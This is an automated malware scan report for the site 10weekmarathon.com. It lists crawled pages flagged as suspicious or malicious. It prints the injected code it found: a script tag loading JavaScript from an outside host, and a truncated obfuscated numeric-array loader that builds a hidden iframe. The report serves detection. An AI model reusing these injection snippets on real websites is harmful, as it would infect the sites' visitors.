Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=10weekmarathon.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://10weekmarathon.com/ | 200 OK Content-Length: 11638 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://www.allyouneedtoearn.com/D4ngQbSy.php?id=60049298" type="text/javascript"></script> | ||
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 163058 Content-Type: application/x-javascript | clean |
http://10weekmarathon.com/index.php | 200 OK Content-Length: 11638 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://www.allyouneedtoearn.com/D4ngQbSy.php?id=60049298" type="text/javascript"></script> | ||
http://10weekmarathon.com/our-story.php | 200 OK Content-Length: 12497 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,160,170,156,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,160,170,156,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,154,163,170,167,160,163,170,167,62,147,163,161,63,173,164,61,147,163,162,170,151,162,170,63,70,116,134,132,122,153,164,74,62,164,154,164,53,77,21,16,44,160,170,156,6 </div> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-6888519-1"); pageTracker._trackPageview(); } catch(err) {} Antivirus reports:
| ||
http://10weekmarathon.com/faq.php | 200 OK Content-Length: 14978 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,160,170,156,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,160,170,156,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,154,163,170,167,160,163,170,167,62,147,163,161,63,173,164,61,147,163,162,170,151,162,170,63,70,116,134,132,122,153,164,74,62,164,154,164,53,77,21,16,44,160,170,156,6 </div> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-6888519-1"); pageTracker._trackPageview(); } catch(err) {} Antivirus reports:
| ||
http://10weekmarathon.com/order2.php | 200 OK Content-Length: 17651 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,160,170,156,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,160,170,156,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,154,163,170,167,160,163,170,167,62,147,163,161,63,173,164,61,147,163,162,170,151,162,170,63,70,116,134,132,122,153,164,74,62,164,154,164,53,77,21,16,44,160,170,156,6 </div> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-6888519-1"); pageTracker._trackPageview(); } catch(err) {} Antivirus reports:
| ||
http://10weekmarathon.com/contact.php | 200 OK Content-Length: 8323 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,160,170,156,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,160,170,156,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,154,163,170,167,160,163,170,167,62,147,163,161,63,173,164,61,147,163,162,170,151,162,170,63,70,116,134,132,122,153,164,74,62,164,154,164,53,77,21,16,44,160,170,156,6 </div> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-6888519-1"); pageTracker._trackPageview(); } catch(err) {} Antivirus reports:
| ||
http://10weekmarathon.com/js/utility.js | 200 OK Content-Length: 7905 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i ) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i ) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j ].src=a[i];}} } function MM_findObj(n, d) { var p,i,x; if(!d) d=document; if((p=n.ind Antivirus reports:
| ||
http://10weekmarathon.com/js/validation.js | 200 OK Content-Length: 13167 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function chkForm() { var email=document.contact.email.value; var sCont = document.contact.email; var sContVal = document.contact.email.value; var str=new String(); str=sContVal; var span=new RegExp("[ ]","g"); var rep=str.replace(span,"9"); var str=new String(); str=sContVal; var span=new RegExp("[ ]","g"); var rep=str.replace(span,"9"); if (document.contact.txtfname.value == '') { al Antivirus reports:
| ||
http://10weekmarathon.com/order.php | 200 OK Content-Length: 12537 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,160,170,156,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,160,170,156,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,154,163,170,167,160,163,170,167,62,147,163,161,63,173,164,61,147,163,162,170,151,162,170,63,70,116,134,132,122,153,164,74,62,164,154,164,53,77,21,16,44,160,170,156,6 </div> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-6888519-1"); pageTracker._trackPageview(); } catch(err) {} Antivirus reports:
| ||
http://10weekmarathon.com/return.php | 200 OK Content-Length: 8926 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,160,170,156,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,160,170,156,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,154,163,170,167,160,163,170,167,62,147,163,161,63,173,164,61,147,163,162,170,151,162,170,63,70,116,134,132,122,153,164,74,62,164,154,164,53,77,21,16,44,160,170,156,6 </div> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-6888519-1"); pageTracker._trackPageview(); } catch(err) {} Antivirus reports:
| ||
http://10weekmarathon.com/terms.php | 200 OK Content-Length: 12060 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,160,170,156,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,160,170,156,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,154,163,170,167,160,163,170,167,62,147,163,161,63,173,164,61,147,163,162,170,151,162,170,63,70,116,134,132,122,153,164,74,62,164,154,164,53,77,21,16,44,160,170,156,6 </div> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https:document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); Antivirus reports:
| ||
http://10weekmarathon.com/test404page.js | 404 Not Found Content-Length: 2998 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://www.allyouneedtoearn.com/D4ngQbSy.php?id=60049300" type="text/javascript"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 10weekmarathon.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 05 Sep 2014 00:13:21 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=2fv9ek0ki07s4fadiobpcpeh97; path=/
GET / HTTP/1.1
Host: 10weekmarathon.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 05 Sep 2014 00:13:21 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=2fv9ek0ki07s4fadiobpcpeh97; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: 10weekmarathon.com
Referer: http://www.google.com/search?q=10weekmarathon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 10weekmarathon.com
Referer: http://www.google.com/search?q=10weekmarathon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.